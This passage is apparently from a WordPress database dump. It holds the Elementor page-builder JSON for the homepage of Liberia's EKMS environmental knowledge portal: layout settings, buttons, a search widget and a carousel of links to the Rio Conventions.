development.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Documents\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore the EKMS Document Database.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Documents\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-and-other-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"876ae3f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"81fa289\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9f9c8b3\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8aa33ed\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"db429d4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#002600\",\"shape_divider_bottom_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"shape_divider_bottom_height\":{\"unit\":\"px\",\"size\":82,\"sizes\":[]},\"shape_divider_bottom_flip\":\"yes\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a37cd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Multilateral Environmental Agreements\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"49af793\",\"elType\":\"widget\",\"settings\":{\"items_list\":[{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_cbd-1.jpg\",\"id\":1854},\"item_title\":\"UNCBD\",\"item_text\":\"The United Nations Convention on Biological Diversity\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-convention-on-biological-diversity\\/\",\"item_link_target\":\"\",\"_id\":\"7311fcf\",\"item_content_type\":\"default\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_fccc.jpg\",\"id\":1856},\"item_content_type\":\"default\",\"item_title\":\"UNFCCC\",\"item_text\":\"The United Nations Framework Convention on Climate Change\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-framework-convention-on-climate-change\\/\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"8abca95\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_ccd.jpg\",\"id\":1855},\"item_content_type\":\"default\",\"item_title\":\"UNCCD\",\"item_text\":\"The United Nations Convention to Combat Desertification\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-convention-to-combat-desertification\\/\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"6b2d2f2\"}],\"item_layout\":\"banners\",\"animation_effect\":\"sarah\",\"img_size\":\"medium\",\"title_html_tag\":\"h6\",\"equal_height_cols\":\"true\",\"slides_to_scroll\":\"3\",\"pause_on_hover\":\"true\",\"autoplay_speed\":2500,\"centered\":\"true\",\"background_background\":\"classic\",\"normal_opacity\":0.40000000000000002220446049250313080847263336181640625,\"hover_opacity\":0.59999999999999997779553950749686919152736663818359375,\"items_title_color\":\"#ffffff\",\"items_title_typography_typography\":\"custom\",\"items_title_typography_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"items_title_typography_font_weight\":\"900\",\"items_title_typography_letter_spacing\":{\"unit\":\"px\",\"size\":2.5,\"sizes\":[]},\"items_text_color\":\"#009ee2\",\"items_text_typography_typography\":\"custom\",\"items_text_typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"items_text_typography_font_weight\":\"700\",\"slides_to_show\":\"3\"},\"elements\":[],\"widgetType\":\"jet-carousel\"},{\"id\":\"c151e2c\",\"elType\":\"widget\",\"settings\":{\"text\":\"View All Agreements\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/multilateral-environmental-agreements\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d48ccf5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0881e40\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"290555e\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"533b1b7\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a8f2e29\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#000000\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true}},\"elements\":[{\"id\":\"46a8277\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8076ded\",\"elType\":\"widget\",\"settings\":{\"title\":\"Start Contributing to the EKMS\",\"description\":\"Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\",\"btn_text\":\"Join the team\",\"btn_link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/contribute\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"title_color\":\"#006400\",\"description_color\":\"#ffffff\",\"button_background_color\":\"#006400\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"oew-call-to-action\"}],\"isInner\":false}],\"isInner\":false}]'),(13209,2140,'_elementor_version','2.7.5'),(13210,2140,'_elementor_template_type','wp-page'),(13211,2140,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(13223,2142,'_wp_page_template','default'),(13224,2142,'_elementor_edit_mode','builder'),(13225,2142,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"slideshow\",\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_color\":\"rgba(255,255,255,0.78)\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5500000000000000444089209850062616169452667236328125},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":2035,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_epa.jpg\"},{\"id\":2036,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home1.jpg\"},{\"id\":2037,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home2.jpg\"},{\"id\":2038,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home3.jpg\"},{\"id\":2039,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_maps.jpg\"}],\"background_slideshow_ken_burns_zoom_direction\":\"out\"},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"background_background\":\"classic\",\"background_color\":\"rgba(0,0,0,0.09)\"},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"left\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":65},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25},\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"900\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The EKMS provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Topics, Institutions and Documents.<\\/p>\",\"align\":\"left\",\"text_color\":\"#ffffff\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":32,\"sizes\":[]},\"typography_font_weight\":\"900\",\"typography_font_family\":\"Roboto\",\"typography_line_height\":{\"unit\":\"em\",\"size\":1.1999999999999999555910790149937383830547332763671875,\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_type\"},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Knowledge Resources\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_topic\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Topics\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-topics\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore Government and Other Institutions that have direct linkages with environmental policies and development.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center 